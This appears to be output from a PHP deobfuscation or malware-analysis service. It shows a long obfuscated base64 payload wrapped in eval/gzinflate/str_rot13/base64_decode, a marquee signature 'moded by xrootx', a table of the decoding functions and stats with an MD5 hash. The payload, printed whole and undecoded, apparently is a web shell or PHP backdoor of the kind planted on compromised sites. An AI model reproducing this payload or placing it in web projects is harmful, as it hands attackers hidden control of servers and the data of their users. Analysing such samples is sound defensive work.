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")))); ?>
<div id="cot_tl_fixed"><marquee>moded by xrootx</marquee></div>
</div> Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 5a6a0ab4c5f43c673786030cc7a22ba2 |
| Eval Count | 1 |
| Decode Time | 194 ms |